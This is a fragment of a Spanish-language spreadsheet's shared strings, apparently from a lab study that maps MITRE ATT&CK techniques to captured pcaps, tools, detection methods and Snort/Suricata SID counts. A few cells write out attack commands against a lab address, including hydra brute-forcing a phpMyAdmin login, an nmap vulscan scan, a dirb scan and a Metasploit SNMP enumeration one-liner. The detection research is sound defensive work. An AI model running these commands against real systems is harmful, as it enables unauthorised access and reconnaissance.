    <t>Manual [2] /  3.1.9.1</t>
  </si>
  <si>
    <t>Manual [5] / C.35</t>
  </si>
  <si>
    <t>Tunelizar la conexión al C2 Server mediante SSH</t>
  </si>
  <si>
    <t>SSH, Metasploit</t>
  </si>
  <si>
    <t>T1572-Protocol_Tunneling_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso de un protocolo para tunelizar comunicaciones C&amp;C</t>
  </si>
  <si>
    <t>Requiere correlación de patrón de flujo y protocolos utilizados dentro de SSH.</t>
  </si>
  <si>
    <t>Tunelizar una conexion mediante SSH</t>
  </si>
  <si>
    <t>La tunelización de un canal no necesariamente es un ataque. Un administrador de red puede utilizar SSH por ejemplo para acceder a otro equipo y es lo mismo que un atacante realizaría</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.6</t>
  </si>
  <si>
    <t>Manual [5] / C.17</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.12</t>
  </si>
  <si>
    <t>Asymetric Cryptography</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Encriptar conexion con C2 Server</t>
  </si>
  <si>
    <t>SSL</t>
  </si>
  <si>
    <t>Metasploit, OpenSSL</t>
  </si>
  <si>
    <t>T1573.002-AsymetricCryptography_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías, monitorizando la creacion de nuevas conexiones</t>
  </si>
  <si>
    <t>Encriptar conexion al C2 Server</t>
  </si>
  <si>
    <t>Encriptar un canal no necesariamente es un ataque.  Un administrador de red puede utilizar SSH por ejemplo para acceder a otro equipo y es lo mismo que un atacante realizaría</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.7</t>
  </si>
  <si>
    <t>Manual [5] / C.18</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.13</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Creación de cuentas de redes sociales</t>
  </si>
  <si>
    <t>Sitios web convencionales (Facebook, Github, Microsoft ...)</t>
  </si>
  <si>
    <t>T1585.001-Establish_social_accounts_[4].pcapng</t>
  </si>
  <si>
    <t>Siempre y cuando el origen sea la red a proteger, detección por anomalías que identifique un incipiente aumento de las peticiones a servidores de redes sociales.</t>
  </si>
  <si>
    <t>La creación de cuentas de redes sociales es una acción totalmente legítima en ciertos contextos</t>
  </si>
  <si>
    <t>Manual [4] /  3.2</t>
  </si>
  <si>
    <t>Manual [4] / B.2</t>
  </si>
  <si>
    <t>Manual [4] / 4.2</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Fuerza bruta para acceso a web</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>T1586.001-Compromise_Accounts_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un ataque de fuerza bruta en base al envío masivo de peticiones de acceso a una página web</t>
  </si>
  <si>
    <t>Ataque de fuerza bruta a formulario de acceso a página web phpMyAdmin. Comando: hydra -l root -P /usr/share/john/password.lst 192.168.2.2 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&amp;pma_password=^PASS^:#1045 Cannot log in to the MySQL server"</t>
  </si>
  <si>
    <t>El uso de la fuerza bruta para acceder a una página web siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [2] / 3.1.2.1</t>
  </si>
  <si>
    <t>Manual [5] / C.36</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.1.3</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Recogida de cuentas de correo eléctronico y validación de las mismas</t>
  </si>
  <si>
    <t>theHarvester, bulk-email-verifier</t>
  </si>
  <si>
    <t>T1589.002-Gather_victim_identity_information_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un número elevado de intentos de conexión y mensajes ehlo SMTP procedentes de un mismo origen hacia un servidor, con diferentes destinatarios.</t>
  </si>
  <si>
    <t>El ataque se caracteriza por comportamiento repetitivo que es visible a nivel de conexión, no a nivel de contenido.</t>
  </si>
  <si>
    <t>La recogida de cuentas de correo electrónico así como la comprobación de su validez puede considerarse como acción legítima en algunos contextos</t>
  </si>
  <si>
    <t>Manual [4] / 3.1</t>
  </si>
  <si>
    <t>Manual [4] / B.1</t>
  </si>
  <si>
    <t>Manual [4] / 4.1</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Escaneo de vulnerabilidades</t>
  </si>
  <si>
    <t>T1595.002-Port_Scanning_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío de paquetes TCP con flag SYN activado a varios puertos diferentes, sin respuesta del atacante a los ACK posteriores.</t>
  </si>
  <si>
    <t>El comportamiento repetitivo en múltiples destinos es visible en los flujos. Herramientas como theHarvester y similares no se enfocan en enviar correos, sino en hacer consultas (por ejemplo, a motores de búsqueda, redes sociales o servidores SMTP) para recolectar direcciones.
No suele haber contenido malicioso en los paquetes, por lo tanto, el DPI no aporta mucho valor.
En cambio, los flujos de red muestran patrones de comportamiento repetitivo:
Muchas conexiones a servicios web o DNS en poco tiempo.
Comportamientos automatizados que simulan actividad de bots.
Por eso se detecta mejor por sistemas como NetFlow, sFlow o Zeek con correlación de actividad</t>
  </si>
  <si>
    <t>Ejecución de comando nmap para escaneo de puertos y detección de vulnerabilidades (nmap -sV --script vulscan IP)</t>
  </si>
  <si>
    <t>Un escaneo exhaustivo de puertos constituye un ataque</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.2</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.2.4 y Manual [5] / C.37</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.2.5</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Escaneo de página web</t>
  </si>
  <si>
    <t>Dirb</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning1_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte peticiones HTTP hacia muchas URLs diferentes con destino el mismo servidor</t>
  </si>
  <si>
    <t>El comportamiento repetitivo en múltiples destinos es visible en los flujos.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Ejecucion de comando dirb para escaneo de la estructura de directorios (dirb </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF1155CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>http://IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> -w /usr/share/dirb/wordlist/vulns/apache.txt)</t>
    </r>
  </si>
  <si>
    <t>Un escaneo exhaustivo de una página web siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [2] /   3.1.1.1</t>
  </si>
  <si>
    <t>Manual [5] / C.38</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.1</t>
  </si>
  <si>
    <t>GoBuster</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning2_[3].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Ejecucion de comando GoBuster para escaneo de la estructura de directorios </t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4.4 y Manual [5] / C.39</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4.5</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Recogida de información de la víctima mediante ingeniería social</t>
  </si>
  <si>
    <t>SEToolKit</t>
  </si>
  <si>
    <t>T1598.003-Spearphishing_Link_[5].pcapng</t>
  </si>
  <si>
    <t>Detección de macros o plantillas comúnmente usadas para llevar a cabo ataques de Phishing</t>
  </si>
  <si>
    <t>El phishing, en general, puede confundirse con actividad legítima (eso es lo que hace que el ataque tenga éxito). En ese sentido, aunque siempre será un ataque, dependiendo del contexto podrá no distinguirse de una actividad legítima</t>
  </si>
  <si>
    <t>Manual [5] / 4.1.1</t>
  </si>
  <si>
    <t>Manual [5] / C.19</t>
  </si>
  <si>
    <t>Manual [5] / 5.1.3</t>
  </si>
  <si>
    <t>NAT Traversal</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Modificación de políticas de red para permitir tráfico externo a la red  interna</t>
  </si>
  <si>
    <t>iptables</t>
  </si>
  <si>
    <t>T1599-NBB1_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías</t>
  </si>
  <si>
    <t>Equipo intermedio entre red interna de la víctima y el atacante con firewall. El atacante con acceso a este equipo intermedio modifica las reglas del firewall iptables para permitir su tráfico.</t>
  </si>
  <si>
    <t>La modificacion de politicas de red puede ser realizada por un atacante o por un administrador de red</t>
  </si>
  <si>
    <t>Manual [5] / 4.4.2</t>
  </si>
  <si>
    <t>Manual [5] / C.20</t>
  </si>
  <si>
    <t>Manual [5] /  5.6.6</t>
  </si>
  <si>
    <t>Network Address Translation Transversal</t>
  </si>
  <si>
    <t>T1599-NBB2_[5].pcapng</t>
  </si>
  <si>
    <t>SNMP</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>Recogida MIB de un equipamiento</t>
  </si>
  <si>
    <t>T1602.001-MIB_Dump_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso del protocolo SNMP sobre UDP para acceder a la comunidad public, con fin de realizar un volcado total de las tablas</t>
  </si>
  <si>
    <t>Este ataque obtiene informacion de la MIB de un equipo mediante peticiones SNMP. Comando: msfconsole -x "use auxiliary/scanner/snmp/snmp_enum; set RHOSTS 192.168.2.2; run; exit"</t>
  </si>
  <si>
    <t>La recogida de MIBs haciendo uso de SNMP no siempre es un ataque, puede tratarse de una acción legítima</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.8.1</t>
  </si>
  <si>
    <t>Manual [5] / C.41</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.1.10</t>
  </si>
  <si>
    <t>Creacion y montado de un contenedor con un servidor SSH sobre un equipo previamente vulnerado</t>
  </si>
  <si>
    <t>DockerAPI, SSH</t>
  </si>
  <si>
    <t>T1612-BuildImageOnHostLocal_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte descargas de contenedores mediante Docker API</t>
  </si>
  <si>
    <t>Construir contenedor sobre el equipo víctima para evitar ser detectados.</t>
  </si>
  <si>
    <t>Construir un contenedor en un equipo puede ser realizado por un administrador de red para alguna labor o por un atacante</t>
  </si>
  <si>
    <t>Manual [5] / 4.4.3</t>
  </si>
  <si>
    <t>Manual [5] / C.21</t>
  </si>
  <si>
    <t>Manual [5] /  5.6.7</t>
  </si>
  <si>
    <t>T1612-BuildImageOnHostNAT_[5].pcapng</t>
  </si>
  <si>
    <t>Comandos mediante Powershell para obtener información sobre configuraciones de políticas de grupo</t>
  </si>
  <si>
    <t>T1615-Group_Policy_Discovery_[5].pcapng</t>
  </si>
  <si>
    <t>Ejecución de comandos mediante Powershell para comprobar políticas de grupo</t>
  </si>
  <si>
    <t>El descubrimiento de politicas de grupo puede ser realizado por un administrador de red o por un atacante</t>
  </si>
  <si>
    <t>Manual [5] /  4.6.1</t>
  </si>
  <si>
    <t>Manual [5] / C.22</t>
  </si>
  <si>
    <t>Manual [5] /  5.8.3</t>
  </si>
  <si>
    <t>Realizar una suplantación de identidad DHCP, saturando el servidor DHCP verdadero para que el servidor DHCP del atacante procese las consultas de un usuario. Posteriormente se manipula alguna consulta inyectando contenido malicioso</t>
  </si>
  <si>
    <t>dhcpstarv, Metasploit</t>
  </si>
  <si>
    <t>T1659-Content_Injection_[5].pcapng</t>
  </si>
  <si>
    <t>La detección de esta técnica será más o menos viable dependiendo del objetivo y método del atacante. Si el ataque se realiza en conjunto con protocolos de gestion(DHCP) dificultará la detección. Resultará necesario monitorizar por la distribución a traves del tráfico de red de archivos malware</t>
  </si>
  <si>
    <t>Suplantacion de identidad de DHCP Server para posteriormente inyectar contenido en la víctima con malware</t>
  </si>
  <si>
    <t>La inyeccion de contenido en otro equipo siempre se considera como un ataque</t>
  </si>
  <si>
    <t>Manual [5] /  4.2.3</t>
  </si>
  <si>
    <t>Manual [5] / C.23</t>
  </si>
  <si>
    <t>Manual [5] /  5.3.6</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un Proxy</t>
  </si>
  <si>
    <t>Metasploit, HTTP Server</t>
  </si>
  <si>
    <t>T1665-Hide_Infrastructure_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por reglas/anomalías. Resulta importante monitorizar tráfico de red con destino a dominios incluidos en listas negras, conexiones a equpos externos...</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un proxy</t>
  </si>
  <si>
    <t>Esconder un servidor C2 siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.5</t>
  </si>
  <si>
    <t>Manual [5] / C.24</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.11</t>
  </si>
  <si>
    <t>L2 (protocolo WiFi)</t>
  </si>
  <si>
    <t>Nº SIN Repeticiones:</t>
  </si>
  <si>
    <t>Requisitos (Snort es un IDS L3, inspecciona mensajes IP y ARP -preprocesador arp_spoof-):
- Network Traffic en MITRE v16.1 (no v17)
- Detectabilidad L3 (Protocolo Visible Snort)
- ARP excluído (preprocesador si/no activado en v2 y v3)</t>
  </si>
  <si>
    <t xml:space="preserve">* Número de alertas: Número de líneas del fichero de log con algún SID, es decir, líneas de ataque. No necesariamente debe coincidir con el número de SIDs totales, pues estos son únicos (e.g. si dos líneas del log tienen el SID 41000, computarían como dos alertas pero un SID). </t>
  </si>
  <si>
    <t>LEYENDA DETECTABLE POR PATRONES</t>
  </si>
  <si>
    <t>LEYENDA SIDs (TP prinicpales y TP colaterales)</t>
  </si>
  <si>
    <t>LEYENDA ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>https://attack.mitre.org/versions/v17/</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">True Positive Colateral </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF6AA84F"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>■</t>
    </r>
  </si>
  <si>
    <t>SI [1]</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas</t>
  </si>
  <si>
    <t>No, salvo circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas y circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>Si es detectable mediante patrones, pero se añade un matiz que afecta a la detección</t>
  </si>
  <si>
    <t>Para diferenciar aquellos TP que identifican instancias/mensajes/flujos de ataque principal frente a aquellos que identifican instancias/mensajes/flujos de ataques colaterales, éstos últimos se colorearán en verde. Aunque estos SIDs contarán como TP, no se incluirán en los contajes definitivos, pues no capturan el ataque implementado</t>
  </si>
  <si>
    <t>En determinadas técnicas, debido a la necesidad de que los flujos se encuentren completos para el análisis con otros cortafuegos como FortiGate o PaloAlto, el establecimiento de conexión no puede omitirse, lo que causa que Snort genere alertas para fases que no constituyen el ataque como tal</t>
  </si>
  <si>
    <t>* "SI": existen reglas (patrones) en los rulesets (de Snort, FG, PA) capaces de detectar el ataque, ya se basen esas reglas en analizar datos del paquete (detección DPI) o en el comportamiento del flujo (detección por flujos).
* "SI*": ="SI" (con alguna apreciación), pero va acompañado (en la columna "MECANISMO DE DETECCIÓN") de una descripción particular que conviene considerar para interpretar mejor la detección. Ejemplo: "La detección de la creación del canal es posible para este caso concreto, en el que el cortafuegos detecta la creación de ambos canales. Sin embargo, si ambos canales, tanto primario como secundario están establecidos, y no se ha detectado su creación, el cambio de uno a otro es inapreciable por el IDS.".
* "NO": No es posible detectarlo por reglas.
* "NO*" (= Salvo ajuste de reglas): si puede detectarse por reglas como antes, pero no basta con las predeterminadas, requiriendo ajustes (tal vez, un "SI**" sería más intuitivo).
* "NO**" (=Salvo casos particulares): No puede detectarse por reglas, salvo algún caso particular del ataque.
* "NO***" (Ambos): "NO*" + "NO**".</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">* </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <u/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Técnicas NO detectables por red según MITRE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>: Aunque se ha comprobado que es posible detectar estos ataques por red, MITRE no los marca como tales (sin "Network Traffic" en "Data Source" o "Detection") porque MITRE sólo indica las fuentes de detección más fiables.
Ejemplo: T1110.001 puede ser detectable por red (y un IDS puede detectar muchos bruteforce en red), pero:
- Cifrado (SSH/TLS/DoH) oculta credenciales y payload; la detección depende de metadatos (tasa, tamaño, flags), no del contenido.
- Ataques distribuidos (low-and-slow desde muchas IPs) pueden parecer tráfico “ruidoso normal” y evadir reglas simples.
- Falsos positivos: servicios legítimos con muchos intentos (automatizaciones, scanners internos) pueden disparar alertas si no están bien filtrados.</t>
    </r>
  </si>
  <si>
    <t>Características del dataset</t>
  </si>
  <si>
    <t>pcap (Nombre)</t>
  </si>
  <si>
    <t>#IPs (sin repetición)</t>
  </si>
  <si>
    <t>CIC2018_DIAx.pcapng
(10 días)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">(Legítimo) Red física de laboratorio que </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>emula</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> una red de empresa</t>
    </r>
  </si>
  <si>
    <t>285GB</t>
  </si>
  <si>
    <t>Check Nombre fichero</t>
  </si>
  <si>
    <t>T1110-pmkid_[1].pcapng</t>
  </si>
  <si>
    <t>Ataque PMKID</t>
  </si>
  <si>
    <t>802.11</t>
  </si>
  <si>
    <t>hashcat, hcxpcapngtool, hcxdumptool</t>
  </si>
  <si>
    <t>T1669-pmkid</t>
  </si>
  <si>
    <t>PMKID se captura pasivamente, sin generar tráfico activo anómalo. No detectable por reglas tradicionales.</t>
  </si>
  <si>
    <t>Flujos detectan puertos de RDP/VNC; DPI analiza autenticaciones y contenido de las sesiones.</t>
  </si>
  <si>
    <t>Un ataque PMKID siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.6.3</t>
  </si>
  <si>
    <t>Manual [1] / E.25</t>
  </si>
  <si>
    <t>Manual [4] / 4.2.32</t>
  </si>
  <si>
    <t>NO (OSI L2)</t>
  </si>
  <si>
    <t>#pcaps:</t>
  </si>
  <si>
    <t>#pcaps Origen CIC2018:</t>
  </si>
  <si>
    <t>#pcaps generados manualmente:</t>
  </si>
  <si>
    <t>RS5</t>
  </si>
  <si>
    <t>RS6</t>
  </si>
  <si>
    <t>RS7</t>
  </si>
  <si>
    <t>RS8</t>
  </si>
  <si>
    <t>RS9</t>
  </si>
  <si>
    <t>T1190-Sql_injection</t>
  </si>
  <si>
    <t>T1190-Sql_inyection1</t>
  </si>
  <si>
    <t>Comprobar que ninguno es "TP"</t>
  </si>
  <si>
    <t>Comprobar que ninguno es "sólo TP"</t>
  </si>
  <si>
    <t>Exfiltración de un fichero de texto en claro hacia el servidor del atacante por el puerto TCP 8080 a través de la herramienta netcat.</t>
  </si>
  <si>
    <t>netcat</t>
  </si>
  <si>
    <t>OK</t>
  </si>
  <si>
    <t>Inspección del contenido de los paquetes TCP (DPI) en busca de cadenas de texto plano o firmas de archivos sensibles en puertos no estándar</t>
  </si>
  <si>
    <t>A pesar de que el ataque se produzca mediante un flujo TCP, para su detección es necesaria la inspección del payload para identificar el contenido del fichero exfiltrado en texto plano.</t>
  </si>
  <si>
    <t>Uso de la utilidad netcat (nc) para exfiltrar un fichero de texto plano a través de una conexión TCP directa por el puerto 8080 hacia la máquina del atacante.</t>
  </si>
  <si>
    <t>El ataque se centra en la exfiltración de información mediante un puerto no estándar</t>
  </si>
  <si>
    <t>Falsificación de una respuesta DNS por puerto UDP para redirigir a la víctima hacia una IP maliciosa</t>
  </si>
  <si>
    <t>dnschef</t>
  </si>
  <si>
    <t>Identificación de respuestas DNS que contienen registros de dirección (A) con IPs maliciosas predefinidas o discrepancias en los identificadores de transacción.</t>
  </si>
  <si>
    <t>Detección basada en el contenido de los paquetes (DPI) al ser necesario analizar los campos de la respuesta DNS para identificar IPs maliciosas o registros manipulados.</t>
  </si>
  <si>
    <t>Manipulación de respuestas DNS mediante la herramienta dnschef para redirigir el tráfico de la víctima hacia una dirección IP maliciosa inyectada en el registro A.</t>
  </si>
  <si>
    <t>El ataque se centra en la manipulación de tráfico mediante el protocolo DNS</t>
  </si>
  <si>
    <t>Inundación masiva de correos electrónicos hacia el servidor de la víctima por puerto TCP</t>
  </si>
  <si>
    <t>swaks</t>
  </si>
  <si>
    <t>Detección de anomalías por volumen de tráfico mediante el recuento de intentos de conexión y mensajes SMTP que superan un umbral de frecuencia definido.</t>
  </si>
  <si>
    <t>Ataque detectable mediante flujos de red ya que su naturaleza es volumétrica y se basa en la alta tasa de conexiones y mensajes SMTP por segundo que superan los umbrales establecidos.</t>
  </si>
  <si>
    <t>Uso de la herramienta swaks para realizar un envío masivo y automatizado de correos electrónicos (SMTP) hacia el puerto 1025 con el fin de saturar el servicio de la víctima.</t>
  </si>
  <si>
    <t>El ataque se centra en el envío masivo de correos mediante el protocolo SMTP</t>
  </si>
  <si>
    <t>41978, 42944</t>
  </si>
  <si>
    <t>33 (1), 18 (1), 3 (1)</t>
  </si>
  <si>
    <t>33, 18, 3</t>
  </si>
  <si>
    <t>12 (15)</t>
  </si>
  <si>
    <t>33 (1)</t>
  </si>
  <si>
    <t>33</t>
  </si>
  <si>
    <t>12 (11)</t>
  </si>
  <si>
    <t>12 (3)</t>
  </si>
  <si>
    <t>15, 12</t>
  </si>
  <si>
    <t>12 (63)</t>
  </si>
  <si>
    <t>12 (1)</t>
  </si>
  <si>
    <t>12 (6)</t>
  </si>
  <si>
    <t>12 (2)</t>
  </si>
  <si>
    <t>28 (1)</t>
  </si>
  <si>
    <t>28</t>
  </si>
  <si>
    <t>54827 (204)</t>
  </si>
  <si>
    <t>54827</t>
  </si>
  <si>
    <t>18 (2), 12 (2)</t>
  </si>
  <si>
    <t>18, 12</t>
  </si>
  <si>
    <t>1, 12</t>
  </si>
  <si>
    <t>5 (4)</t>
  </si>
  <si>
    <t>19439 (1), 19 (1)</t>
  </si>
  <si>
    <t>19439, 19</t>
  </si>
  <si>
    <t>19439 (1)</t>
  </si>
  <si>
    <t>19439</t>
  </si>
  <si>
    <t>12, 1</t>
  </si>
  <si>
    <t>5 (1)</t>
  </si>
  <si>
    <t>18 (1), 3 (1)</t>
  </si>
  <si>
    <t>18, 3</t>
  </si>
  <si>
    <t>12 (5)</t>
  </si>
  <si>
    <t>33 (2), 18 (2), 3 (2)</t>
  </si>
  <si>
    <t>54827 (21)</t>
  </si>
  <si>
    <t>20 (249)</t>
  </si>
  <si>
    <t>20</t>
  </si>
  <si>
    <t>20 (2)</t>
  </si>
  <si>
    <t>20 (1590)</t>
  </si>
  <si>
    <t>20 (8140)</t>
  </si>
  <si>
    <t>20 (1)</t>
  </si>
  <si>
    <t>12 (13)</t>
  </si>
  <si>
    <t>12 (7)</t>
  </si>
  <si>
    <t>14 (1), 18 (1), 3 (1)</t>
  </si>
  <si>
    <t>14, 18, 3</t>
  </si>
  <si>
    <t>12 (21291)</t>
  </si>
  <si>
    <t>12 (14)</t>
  </si>
  <si>
    <t>12 (183)</t>
  </si>
  <si>
    <t>12 (24)</t>
  </si>
  <si>
    <t>12 (39)</t>
  </si>
  <si>
    <t>1 (1), 12 (1)</t>
  </si>
  <si>
    <t>15 (2)</t>
  </si>
  <si>
    <t>15</t>
  </si>
  <si>
    <t>2010937 (1), 2010935 (1), 2010936 (1), 2010939 (1), 2002910 (1), 2002911 (1)</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 2002911</t>
  </si>
  <si>
    <t>2044073 (6)</t>
  </si>
  <si>
    <t>2044073</t>
  </si>
  <si>
    <t>2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>2000418 (1)</t>
  </si>
  <si>
    <t>2000418</t>
  </si>
  <si>
    <t>2035480 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2035480, 2025644</t>
  </si>
  <si>
    <t>2027792 (2), 2027794 (2), 2027793 (2)</t>
  </si>
  <si>
    <t>2034567 (1), 2013028 (1), 2019240 (1), 2044770 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028, 2019240, 2044770</t>
  </si>
  <si>
    <t>2026850 (19)</t>
  </si>
  <si>
    <t>2026850</t>
  </si>
  <si>
    <t>2016141 (1)</t>
  </si>
  <si>
    <t>2016141</t>
  </si>
  <si>
    <t>2053459 (1)</t>
  </si>
  <si>
    <t>2053459</t>
  </si>
  <si>
    <t>2034567 (1), 2013028 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028</t>
  </si>
  <si>
    <t>2001330 (2)</t>
  </si>
  <si>
    <t>2001330</t>
  </si>
  <si>
    <t>2009714 (5505)</t>
  </si>
  <si>
    <t>2009714</t>
  </si>
  <si>
    <t>2031379 (1), 2041131 (1), 2016141 (1), 2035480 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2031379, 2041131, 2016141, 2035480, 2025644</t>
  </si>
  <si>
    <t>2035480 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2019348 (63)</t>
  </si>
  <si>
    <t>2019348</t>
  </si>
  <si>
    <t>2014153 (540)</t>
  </si>
  <si>
    <t>2014153</t>
  </si>
  <si>
    <t>2001579 (1)</t>
  </si>
  <si>
    <t>2001579</t>
  </si>
  <si>
    <t>2012870 (1)</t>
  </si>
  <si>
    <t>2012870</t>
  </si>
  <si>
    <t>2100366 (5)</t>
  </si>
  <si>
    <t>2100366</t>
  </si>
  <si>
    <t>2000418 (3)</t>
  </si>
  <si>
    <t>2101411 (396)</t>
  </si>
  <si>
    <t>2101411</t>
  </si>
  <si>
    <t>2044770 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>2044770, 2019240</t>
  </si>
  <si>
    <t>2013504 (157)</t>
  </si>
  <si>
    <t>2013504</t>
  </si>
  <si>
    <t>2018959 (1), 2035480 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2018959, 2035480, 2025644</t>
  </si>
  <si>
    <t>18 (2), 12 (2), 2027792 (2), 2027794 (2), 2027793 (2)</t>
  </si>
  <si>
    <t>18, 12, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>33 (1), 18 (1), 3 (1), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>12 (1), 2031379 (1), 2041131 (1), 2016141 (1), 2035480 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>12, 2031379, 2041131, 2016141, 2035480, 2025644</t>
  </si>
  <si>
    <t>1 (1), 12 (1), 2018959 (1), 2035480 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>1, 12, 2018959, 2035480, 2025644</t>
  </si>
  <si>
    <t>29456 (16), 384 (16), 31767 (16), 408 (16)</t>
  </si>
  <si>
    <t>29456, 384, 31767, 408</t>
  </si>
  <si>
    <t>50447 (19)</t>
  </si>
  <si>
    <t>50447</t>
  </si>
  <si>
    <t>44486 (1), 44484 (1), 44488 (1), 44487 (1), 44485 (1)</t>
  </si>
  <si>
    <t>44486, 44484, 44488, 44487, 44485</t>
  </si>
  <si>
    <t>50447 (2)</t>
  </si>
  <si>
    <t>1394 (1), 17107 (1), 37961 (1), 50447 (1), 19439 (1), 17410 (1), 19 (1)</t>
  </si>
  <si>
    <t>1394, 17107, 37961, 50447, 19439, 17410, 19</t>
  </si>
  <si>
    <t>40063 (565)</t>
  </si>
  <si>
    <t>40063</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2002752, 2002749</t>
  </si>
  <si>
    <t>2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059104</t>
  </si>
  <si>
    <t>2100527 (2), 2101620 (2)</t>
  </si>
  <si>
    <t>2100527, 2101620</t>
  </si>
  <si>
    <t>2034567, 2013028, 2002824, 2002752, 2002749</t>
  </si>
  <si>
    <t>2002749 (2)</t>
  </si>
  <si>
    <t>2002749</t>
  </si>
  <si>
    <t>2002749 (20)</t>
  </si>
  <si>
    <t>2100527 (69)</t>
  </si>
  <si>
    <t>2100527</t>
  </si>
  <si>
    <t>2002752 (6), 2002749 (6)</t>
  </si>
  <si>
    <t>2002749 (9)</t>
  </si>
  <si>
    <t>2002749 (7)</t>
  </si>
  <si>
    <t>2002749, 2002822</t>
